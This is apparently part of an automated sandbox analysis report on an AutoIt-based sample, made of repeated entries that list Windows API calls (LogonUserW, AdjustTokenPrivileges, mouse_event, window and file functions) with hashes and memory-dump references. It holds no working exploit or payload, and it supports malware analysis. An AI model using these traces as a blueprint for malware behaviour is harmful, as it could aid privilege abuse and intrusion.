                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: da206087183914885dbb3f224d51af8f70d35b898de4ca87473767d523799665
                                                          • Instruction ID: 6627914b0ed05c80c1b54d00ab83624a689d8af2fd3377f652b60cc9a8f13204
                                                          • Opcode Fuzzy Hash: da206087183914885dbb3f224d51af8f70d35b898de4ca87473767d523799665
                                                          • Instruction Fuzzy Hash: 431161726006049FDB10DF29D885A6AF7E9FF89324F00851DF9A9DB2A1DB30AD05DF81
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CD9468,?,00CEFB84,?), ref: 00CCA097
                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CD9468,?,00CEFB84,?), ref: 00CCA0A9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: 1aac85b619e69ff0f7d4aa16e7b5336e2dd7ab8ade951bcdf8b395df2298b0a3
                                                          • Instruction ID: ee0b2685773ffd43366627d51595181798011b0f652df01b504a24a9de0a1ed2
                                                          • Opcode Fuzzy Hash: 1aac85b619e69ff0f7d4aa16e7b5336e2dd7ab8ade951bcdf8b395df2298b0a3
                                                          • Instruction Fuzzy Hash: FAF0823510522DABDB219FA4CC89FEE776CFF08361F00426AF919D6191D6309A40CBA1
                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CB8309), ref: 00CB81E0
                                                          • CloseHandle.KERNEL32(?,?,00CB8309), ref: 00CB81F2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: 7c3583ea3e9f85065c004b72ef5876f731ea3948cb2576f9c12d2dda3a711172
                                                          • Instruction ID: 75b9dc63d6e6678f5f8f6aba7e5b0c9a81ac25c4d0929f24790ea7cb3d0da359
                                                          • Opcode Fuzzy Hash: 7c3583ea3e9f85065c004b72ef5876f731ea3948cb2576f9c12d2dda3a711172
                                                          • Instruction Fuzzy Hash: BEE08631001510AFE7212B20EC04E7777EDEF00314B20882DF4A584470CB615C91DB10
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C88D57,?,?,?,00000001), ref: 00C8A15A
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C8A163
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 7fd5fcacbec40c52056d1f5504c63166fcef3e382a7198bfdfaea0487a575fa2
                                                          • Instruction ID: b0bbc6472662c072399ecb737fea29a90e2be6b771c17d997282b4d2dd51b453
                                                          • Opcode Fuzzy Hash: 7fd5fcacbec40c52056d1f5504c63166fcef3e382a7198bfdfaea0487a575fa2
                                                          • Instruction Fuzzy Hash: EDB09231054248ABCA002B91EC49B8C3F68EB44AA2F405024F60D88474CB6255528A91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ede2aa2ecb92a152933244927759da3ec241c3665f2a72df695d46645d2fea24
                                                          • Instruction ID: bcd27ee5e098cf5fade909c39598d3388fd10f4e993c012a117509e96f9adbab
                                                          • Opcode Fuzzy Hash: ede2aa2ecb92a152933244927759da3ec241c3665f2a72df695d46645d2fea24
                                                          • Instruction Fuzzy Hash: 48322A31D29F014ED7236634D832339A249AFB73C8F15D73BF829B59A5EB28C5838205
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5116b5e13309fdb91e408ed65eb114c66d1716dce3748fdcdb9f7bfded894867
                                                          • Instruction ID: 5096970ce7c364e546f5df79165d2653640b101f6fa706c748fddef0556e472e
                                                          • Opcode Fuzzy Hash: 5116b5e13309fdb91e408ed65eb114c66d1716dce3748fdcdb9f7bfded894867
                                                          • Instruction Fuzzy Hash: 45B10261D2AF404DD7239639883533AFA5CAFBB2C5F52D71BFC5A70D62EB2185838142
                                                          APIs
                                                          • __time64.LIBCMT ref: 00CC889B
                                                            • Part of subcall function 00C8520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CC8F6E,00000000,?,?,?,?,00CC911F,00000000,?), ref: 00C85213
                                                            • Part of subcall function 00C8520A: __aulldiv.LIBCMT ref: 00C85233
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                          • String ID:
                                                          • API String ID: 2893107130-0
                                                          • Opcode ID: f074719c1ef68f1d900b6f11dcb7d50640780c73865d8237a63ccbdacbc534e0
                                                          • Instruction ID: 50544d4e55f4115940545eed3535a6ded09684f3e3875c6b8e7204083f37c7f6
                                                          • Opcode Fuzzy Hash: f074719c1ef68f1d900b6f11dcb7d50640780c73865d8237a63ccbdacbc534e0
                                                          • Instruction Fuzzy Hash: B721B4326356108BC729CF25D841B52B3E1EFA5311B688E6CD0F5CB2C0CA74B905CB54
                                                          APIs
                                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00CC4C76
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID:
                                                          • API String ID: 2434400541-0
                                                          • Opcode ID: 44e8763498d18f01efb65f2a2423f0e3904fb1ddd2ef45869aba15e2553953f3
                                                          • Instruction ID: 04f4e9a080ceb2216ac06bc7513ee08574843c7580251d2b36c5158198354e45
                                                          • Opcode Fuzzy Hash: 44e8763498d18f01efb65f2a2423f0e3904fb1ddd2ef45869aba15e2553953f3
                                                          • Instruction Fuzzy Hash: 85D09EA416261979EC2C0720DDBBFFA1119E380791F94D54EF251991E1E8D4DD41A035
                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00CB8389), ref: 00CB87D1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          • Opcode ID: 38012400b00099f5e96f74ee2d8bb00a88b1a03f3acf053db64240e81125aa2c
                                                          • Instruction ID: 7ff96f1abf60f5e9fc9b036e4072b66ca06e3301a312750d982c98cfd93588bb
                                                          • Opcode Fuzzy Hash: 38012400b00099f5e96f74ee2d8bb00a88b1a03f3acf053db64240e81125aa2c
                                                          • Instruction Fuzzy Hash: F6D05E3226050EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C8A12A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 98b5e8a7685accaa1bdb11abb1c9fe10b74bc79e7cd8b8f4d0232b3241fa5c3d
                                                          • Instruction ID: f55b2bb7acd3583cae4947138c63736b0ca4607a78bba506ba354c24f2a40ed7
                                                          • Opcode Fuzzy Hash: 98b5e8a7685accaa1bdb11abb1c9fe10b74bc79e7cd8b8f4d0232b3241fa5c3d
                                                          • Instruction Fuzzy Hash: 6CA0223000020CFBCF002F82FC08A8CBFACEB002E0B008030F80C88032CB33A8228AC0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5d9984a4191934cb7728d0afa6955d4a6cb801532c17ad9c210fc827a05b6bc
                                                          • Instruction ID: 29ab167631ee3fb7bc2e33d4bdc80c79ad4cdaf6dc0299a5f4592c255db20839
                                                          • Opcode Fuzzy Hash: e5d9984a4191934cb7728d0afa6955d4a6cb801532c17ad9c210fc827a05b6bc
                                                          • Instruction Fuzzy Hash: 32225930548546CBDF388A29C4987BCBBA1FF41314F28C06BDB6A87592DB74DE89D742
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                          • Instruction ID: 135916b732aa917bc11538fdd8b6d30a039d3501a53ecb4650cdd0a295d53a22
                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                          • Instruction Fuzzy Hash: 72C1A93220506309DF2E573A843813EFAE55EA27B531E475ED8B3CB1D4EE20CA25D724
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                          • Instruction ID: 8653e1b56f29477a00430ddf96198a09eb2e560b19d6f91ae0261731bd5cb250
                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                          • Instruction Fuzzy Hash: 89C175332051A30ADF2E563AC43813EBAE55FA27B531E476ED8B3DB1D4EE10CA259714
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction ID: 5f355c1cab61126d5e0af8b0957c067ca6460c4bb55568f488e6654841cbcfcd
                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction Fuzzy Hash: 9AC185322051A30ADF2E563AC43413EBAE55EA27B531E476EDCB3CB1C4EE10CA26D714
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00CD785B
                                                          • DeleteObject.GDI32(00000000), ref: 00CD786D
                                                          • DestroyWindow.USER32 ref: 00CD787B
                                                          • GetDesktopWindow.USER32 ref: 00CD7895
                                                          • GetWindowRect.USER32(00000000), ref: 00CD789C
                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00CD79DD
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00CD79ED
                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7A35
                                                          • GetClientRect.USER32(00000000,?), ref: 00CD7A41
                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CD7A7B
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7A9D
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7AB0
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7ABB
                                                          • GlobalLock.KERNEL32(00000000), ref: 00CD7AC4
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7AD3
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00CD7ADC
                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7AE3
                                                          • GlobalFree.KERNEL32(00000000), ref: 00CD7AEE
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7B00
                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CF2CAC,00000000), ref: 00CD7B16
                                                          • GlobalFree.KERNEL32(00000000), ref: 00CD7B26
                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00CD7B4C
                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00CD7B6B
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7B8D
                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7D7A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                          • API String ID: 2211948467-2373415609
                                                          • Opcode ID: b1e2539f9c1d7626d7032c5b8551394f373e861eae14535cf15c6bcb3393bec6
                                                          • Instruction ID: 5c2d9bf8c82ac9c0a07e3f41a8b78d406b028a1f7367262363a2b0e570ece9a5
                                                          • Opcode Fuzzy Hash: b1e2539f9c1d7626d7032c5b8551394f373e861eae14535cf15c6bcb3393bec6
                                                          • Instruction Fuzzy Hash: 22024E71900255EFDB14DFA4DC89EAE7BB9EF48310F148259FA15AB3A1D731AD02CB60
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,00CEF910), ref: 00CE3627
                                                          • IsWindowVisible.USER32(?), ref: 00CE364B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpperVisibleWindow
                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                          • API String ID: 4105515805-45149045
                                                          • Opcode ID: 9cc86d017f68ec0ed2fd9d539f5588a0754951667bd533a9e75a3998949917a3
                                                          • Instruction ID: b67bcfcde9c6ab9366bcbf71ab5017782fbe32ad4e178bf119729e17455c4830
                                                          • Opcode Fuzzy Hash: 9cc86d017f68ec0ed2fd9d539f5588a0754951667bd533a9e75a3998949917a3
                                                          • Instruction Fuzzy Hash: 52D1A2742043819BCB14EF11C46AAAEB7E5EF94344F154468F8925B3E3CB31EE4AEB51
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 00CEA630
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00CEA661
                                                          • GetSysColor.USER32(0000000F), ref: 00CEA66D
                                                          • SetBkColor.GDI32(?,000000FF), ref: 00CEA687
                                                          • SelectObject.GDI32(?,00000000), ref: 00CEA696
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00CEA6C1
                                                          • GetSysColor.USER32(00000010), ref: 00CEA6C9
                                                          • CreateSolidBrush.GDI32(00000000), ref: 00CEA6D0
                                                          • FrameRect.USER32(?,?,00000000), ref: 00CEA6DF
                                                          • DeleteObject.GDI32(00000000), ref: 00CEA6E6
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00CEA731
                                                          • FillRect.USER32(?,?,00000000), ref: 00CEA763
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00CEA78E
                                                            • Part of subcall function 00CEA8CA: GetSysColor.USER32(00000012), ref: 00CEA903
                                                            • Part of subcall function 00CEA8CA: SetTextColor.GDI32(?,?), ref: 00CEA907
                                                            • Part of subcall function 00CEA8CA: GetSysColorBrush.USER32(0000000F), ref: 00CEA91D
                                                            • Part of subcall function 00CEA8CA: GetSysColor.USER32(0000000F), ref: 00CEA928
                                                            • Part of subcall function 00CEA8CA: GetSysColor.USER32(00000011), ref: 00CEA945
                                                            • Part of subcall function 00CEA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CEA953
                                                            • Part of subcall function 00CEA8CA: SelectObject.GDI32(?,00000000), ref: 00CEA964
                                                            • Part of subcall function 00CEA8CA: SetBkColor.GDI32(?,00000000), ref: 00CEA96D
                                                            • Part of subcall function 00CEA8CA: SelectObject.GDI32(?,?), ref: 00CEA97A
                                                            • Part of subcall function 00CEA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00CEA999
                                                            • Part of subcall function 00CEA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CEA9B0
                                                            • Part of subcall function 00CEA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00CEA9C5
                                                            • Part of subcall function 00CEA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CEA9ED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
